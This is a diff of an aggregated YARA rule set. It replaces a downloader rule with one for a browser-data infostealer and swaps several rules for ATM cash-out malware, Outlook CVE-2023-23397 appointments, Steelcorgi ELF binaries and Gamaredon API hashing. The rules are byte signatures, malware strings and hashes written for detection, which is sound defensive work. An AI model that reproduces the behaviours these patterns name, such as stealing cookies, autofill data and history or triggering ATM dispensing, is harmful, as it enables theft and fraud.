 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Downloader"
-		tc_detection_name = "dlMarlboro"
-		tc_detection_factor = 3
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "GomorrahStealer"
+		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$ping_apnic = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
-            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+		$get_browser_autofill_data = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
+            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
+            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
+            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ??
+            ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ??
+            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00
+            11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13
+            ?? 00 28 ?? ?? ?? ?? DE
         }
-		$download_bin_1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F2 8B C1 89 85 ??
-            ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ??
-            ?? ?? 83 EC ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 56 C6 01
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84
-            05 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF 50 ?? 8D 4D ?? 51 8B
-            C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ??
-            ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ??
-            ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? EB ?? 32 DB
+		$get_browser_cookies = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
+            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
+            13 ?? 38 ?? ?? ?? ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
+            16 2B ?? 17 00 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 14 (FE | 01) ?? 13 ??
+            11 ?? 2C ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 00
+            08 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00 11 ?? 17 72 ?? ?? ?? ?? A2 00 11
+            ?? 18 11 ?? A2 00 11 ?? 19 72 ?? ?? ?? ?? A2 00 11 ?? 1A 11 ?? A2 00 11 ?? 1B 72 ??
+            ?? ?? ?? A2 00 11 ?? 1C 11 ?? A2 00 11 ?? 1D 72 ?? ?? ?? ?? A2 00 11 ?? 1E 11 ?? A2
+            00 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11
+            ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ??
+            16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
         }
-		$download_bin_2 = {
-            C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 8D 80 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
-            C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
-            C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A
-            ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ??
-            83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94
-            C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ??
-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 72 ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 EB ?? 8B 8D ?? ?? ??
-            ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ??
-            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3
+		$take_screenshot = {
+            12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 28
+            ?? ?? ?? ?? 0A 06 12 ?? 16 16 28 ?? ?? ?? ?? 00 11 ?? 12 ?? 16 16 28 ?? ?? ?? ?? 00
+            11 ?? 08 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
+            ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE
+        }
+		$get_antivirus_information = {
+            7E ?? ?? ?? ?? 0B 00 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            1B (FE | 02) ?? 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
+            73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
+            13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 00 11 ?? 6F ?? ?? ?? ??
+            13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 00 08 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 28
+            ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 08 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 0C DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
+            11 ?? 3A ?? ?? ?? ?? 00 DE ?? 11 ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ??
+            11 ?? 6F ?? ?? ?? ?? 00 00 DC 08 0B DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00
+            07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 07 17 8D ?? ?? ?? ?? 13 ?? 11 ??
+            16 1F ?? 9D 11 ?? 6F ?? ?? ?? ?? 17 9A 16 8D ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 0B 00 07 0A 2B ?? 06
+        }
+		$get_browser_history = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
+            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
+            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
+            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17
+            D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 31 ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $ping_apnic and $download_bin_1 and $download_bin_2
+		uint16( 0 ) == 0x5A4D and ( $get_browser_autofill_data ) and ( $get_browser_cookies ) and ( $take_screenshot ) and ( $get_antivirus_information ) and ( $get_browser_history )
 }
 /*
  * YARA Rule Set
  * Repository Name: R3c0nst
  * Repository: https://github.com/fboldewin/YARA-rules/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 54e9e6899b258b72074b2b4db6909257683240c2
  * Number of Rules: 26
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -57997,41 +58594,61 @@ rule REVERSINGLABS_Win32_Downloader_Dlmarlboro : TC_DETECTION MALICIOUS MALWARE
  *
  * NO LICENSE SET
  */
-rule R3C0NST_Exploit_Outlook_CVE_2023_23397 : CVE_2023_23397 FILE
+rule R3C0NST_UNC2891_Steelcorgi : FILE
 {
 	meta:
-		description = "Detects Outlook appointments exploiting CVE-2023-23397"
-		author = "Frank Boldewin"
-		id = "7e355e5f-93ca-561d-9a12-f73f1d429e4d"
-		date = "2023-03-19"
-		modified = "2023-03-25"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Exploit_Outlook_CVE_2023_23397.yar#L1-L30"
+		description = "Detects UNC2891 Steelcorgi packed ELF binaries"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "94da7da5-5fc3-5221-97d6-1854aa7b1959"
+		date = "2022-03-30"
+		modified = "2023-01-05"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Steelcorgi.yar#L1-L17"
 		license_url = "N/A"
-		logic_hash = "1847e8223b2f6d3ec5108e15ee46ef031ee1e26d3a5e8ed4a70c77b031f6a5b6"
+		logic_hash = "4f956b9eaec66bc606ffd0afa2fe9303194e9a8c12d4c3de6ab2334c9856dd99"
 		score = 75
-		quality = 86
-		tags = "CVE-2023-23397, FILE"
-		Author = "Frank Boldewin (@r3c0nst)"
-		Hash1 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
-		Hash2 = "a034427fd8524fd62380c881c30b9ab483535974ddd567556692cffc206809d1"
-		Hash3 = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
-		Hash4 = "1543677037fa339877e1d6ef2d077f94613afbcd6434d7181a18df74aca7742b"
+		quality = 90
+		tags = "FILE"
+		hash1 = "0760cd30d18517e87bf9fd8555513423db1cd80730b47f57167219ddbf91f170"
+		hash2 = "3560ed07aac67f73ef910d0b928db3c0bb5f106b5daee054666638b6575a89c5"
+		hash3 = "5b4bb50055b31dbd897172583c7046dd27cd03e1e3d84f7a23837e8df7943547"
 
 	strings:
-		$ipmtask = "IPM.Task" wide ascii
-		$ipmappointment = "IPM.Appointment" wide ascii
-		$ipmtaskb64 = "IPM.Task" base64 base64wide
-		$ipmappointmentb64 = "IPM.Appointment" base64 base64wide
-		$unc_path1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00|3? 00 3? 00|3? 00 3? 00 3? 00) }
-		$unc_path2 = { 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3?|3? 3?|3? 3? 3?) }
-		$unc_a = "\x00\x00\x00\x5c\x5c" base64
-		$unc_w = "\x00\x00\x5c\x00\x5c" base64wide
-		$mail1 = "from:" ascii wide nocase
-		$mail2 = "received:" ascii wide nocase
+		$pattern1 = {70 61 64 00 6C 63 6B 00}
+		$pattern2 = {FF 72 FF 6F FF 63 FF 2F FF 73 FF 65 FF 6C FF 66 FF 2F FF 65 FF 78 FF 65}
 
 	condition:
-		(( uint32be( 0 ) == 0xD0CF11E0 or uint32be( 0 ) == 0x789F3E22 ) or ( all of ( $mail* ) ) ) and ( ( $ipmtask or $ipmappointment ) or ( $ipmtaskb64 or $ipmappointmentb64 ) ) and ( ( $unc_path1 or $unc_path2 ) or ( $unc_a or $unc_w ) )
+		uint32( 0 ) == 0x464c457f and all of them
+}
+rule R3C0NST_ATM_Malware_Dispcashbr : FILE
+{
+	meta:
+		description = "Detects ATM Malware DispCashBR"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "17d22120-0ca2-5b27-9816-21ab4a6fb20c"
+		date = "2020-02-27"
+		modified = "2020-08-17"
+		reference = "https://twitter.com/r3c0nst/status/1232944566208286720"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispCashBR.yar#L1-L21"
+		license_url = "N/A"
+		logic_hash = "3fb5d62cb779ddc13e9b938290dfa9d2a3353d7969e639a662c1bcaca945de4d"
+		score = 75
+		quality = 90
+		tags = "FILE"
+		hash1 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
+
+	strings:
+		$String1 = "(*) Dispensando: %lu" ascii nocase
+		$String2 = "COMANDO EXECUTADO COM SUCESSO" ascii nocase
+		$String3 = "[+] FOI SACADO:  %lu R$ [+]" ascii nocase
+		$DbgStr1 = "_Get_Information_cdm_cuinfo" ascii nocase
+		$DbgStr2 = "_GET_INFORMATION_SHUTTER" ascii nocase
+		$Code1 = {C7 44 24 08 00 00 00 00 C7 44 24 04 2F 01 00 00 89 04 24 E8}
+		$Code2 = {C7 44 24 08 00 00 00 00 C7 44 24 04 17 05 00 00 89 04 24 E8}
+		$Code3 = {89 4C 24 08 C7 44 24 04 2E 01 00 00 89 04 24 E8}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of ( $String* ) and 1 of ( $DbgStr* ) and all of ( $Code* )
 }
 rule R3C0NST_Ransomware_Germanwiper : FILE
 {
@@ -58067,114 +58684,97 @@ rule R3C0NST_Ransomware_Germanwiper : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and filesize < 1000KB and 5 of them
 }
-rule R3C0NST_ATM_Malware_Loup : FILE
-{
-	meta:
-		description = "Detects ATM Malware Loup"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "4786362f-b2c5-5b69-8b06-9216561286e6"
-		date = "2020-08-17"
-		modified = "2020-08-17"
-		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Loup.yar#L1-L16"
-		license_url = "N/A"
-		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
-		logic_hash = "39efced4ee3a6147acf5732e4be3a5e9859268b35b79f5e8e87d7c4d77a588c0"
-		score = 75
-		quality = 90
-		tags = "FILE"
-
-	strings:
-		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii nocase
-		$String2 = "CurrencyDispenser1" ascii nocase
-		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
-}
-rule R3C0NST_ATM_Malware_NVISOSPIT : FILE
+rule R3C0NST_ATM_Malware_XFS_DIRECT : FILE
 {
 	meta:
-		description = "Detects ATM Malware NVISOSPIT"
+		description = "Detects ATM Malware XFS_DIRECT"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "faf9e78e-9d7a-5c9b-a08e-90b895333d5c"
-		date = "2019-05-31"
-		modified = "2019-05-31"
-		reference = "https://twitter.com/r3c0nst/status/1134403094157115392"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.NVISOSPIT.yar#L3-L18"
+		id = "d1551c50-d3d2-56fd-a6b7-198d3a26ac72"
+		date = "2019-10-18"
+		modified = "2019-10-19"
+		reference = "https://twitter.com/r3c0nst/status/1185237040583106560"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFS_DIRECT.yar#L1-L37"
 		license_url = "N/A"
-		hash = "d7ce7b152f0da49e96fa32a9336b35253905d9940b001288d0df55d8f8b3951f"
-		logic_hash = "11c1fea74b72a7821ce76a95846a2caff7354e71906496d9530cb44339a49a98"
+		logic_hash = "844a334d0eb8516c0ef3780e48e3dbc8e23d41c80bdff10f01407b775e72709e"
 		score = 75
 		quality = 90
 		tags = "FILE"
+		hash1 = "3e023949fecd5d06b3dff9e86e6fcac6a9ec6c805b93118db43fb4e84fe43ee0"
+		hash2 = "303f2a19b286ca5887df2a334f22b5690dda9f092e677786e2a8879044d8ad11"
+		hash3 = "15d50938e51ee414124314095d3a27aa477f40413f83d6a2b2a2007efc5a623a"
+		hash4 = "0f9cb4dc1ac2777be30145c3271c95a027758203d0de245ec390037f7325d79d"
+		hash5 = "141ae291ddae60fd1b232f543bc9b40f3a083521cd7330c427bb8fc5cdd23966"
+		hash6 = "66eb1a8134576db05382109eec7e297149f25a021aba5171d2f99aa49c381456"
+		hash7 = "ac20b12beefb2036595780aaf7ec29203e2e09b6237d93cd26eaa811cebd6665"
+		hash8 = "901fc474f50eb62edc526593208a7eec4df694e342ffc5b895d1dcec953c6899"
+		hash9 = "56548c26741b25b15c27a0de498c5e04c69b0c9250ba35e3a578bc2f05eedd07"
+		hash10 = "c89f1d562983398ab2d6dd75e4e30cc0e95eab57cdf48c4a17619dca9ecc0748"
 
 	strings:
-		$MalwareName = "NVISOSPIT" ascii fullword
-		$DispenseCommand = "Calling WFSExecute() to dispense $%d" fullword ascii
-		$Code = {C6 85 7D F9 FF FF 4D C6 85 7E F9 FF FF 4D C6 85 7F F9 FF FF 4B}
+		$EncLayer1 = {0F B6 51 FC 30 50 FF 0F B6 11 30 10 0F B6 51 04 30 50 01 0F B6 51 08 30 50 02}
+		$EncLayer2 = {B8 4D 5A 00 00 89 33 66 39 06 75 ?? 8b ?? 3c}
+		$String1 = "NOW ENTER MASTER KEY" ascii nocase
+		$String2 = "Closing app, than delete myself." ascii nocase
+		$String3 = "Number of phisical cash units is:" ascii nocase
+		$String4 = "COULD NOT ENABLE or DISABLE connection" ascii nocase
+		$String5 = "XFS_DIRECT" ascii nocase
+		$String6 = "Take the money you snicky mother fucker :)" ascii nocase
+		$String7 = "ATM IS TEMPORARILY OUT OF SERVICE!" wide nocase
+		$Code1 = {D1 F8 89 44 24 10 DB 44 24 10 DC 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 35 2F 81 0B 00 A3}
+		$Code2 = {8B ?? ?? ?? 68 2E 01 00 00 52 C7 ?? 06 01 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of them
+		uint16( 0 ) == 0x5A4D and ( filesize < 1500KB and all of ( $EncLayer* ) ) or ( filesize < 300KB and 4 of ( $String* ) and all of ( $Code* ) )
 }
-rule R3C0NST_UNC2891_Steelcorgi : FILE
+rule R3C0NST_Gamaredon_Getimportbyhash : FILE
 {
 	meta:
-		description = "Detects UNC2891 Steelcorgi packed ELF binaries"
+		description = "Detects Gamaredon APIHashing"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "94da7da5-5fc3-5221-97d6-1854aa7b1959"
-		date = "2022-03-30"
-		modified = "2023-01-05"
+		id = "8f28273e-e8ca-52cb-8dbc-a235598b1975"
+		date = "2021-05-12"
+		modified = "2021-05-12"
 		reference = "https://github.com/fboldewin/YARA-rules/"
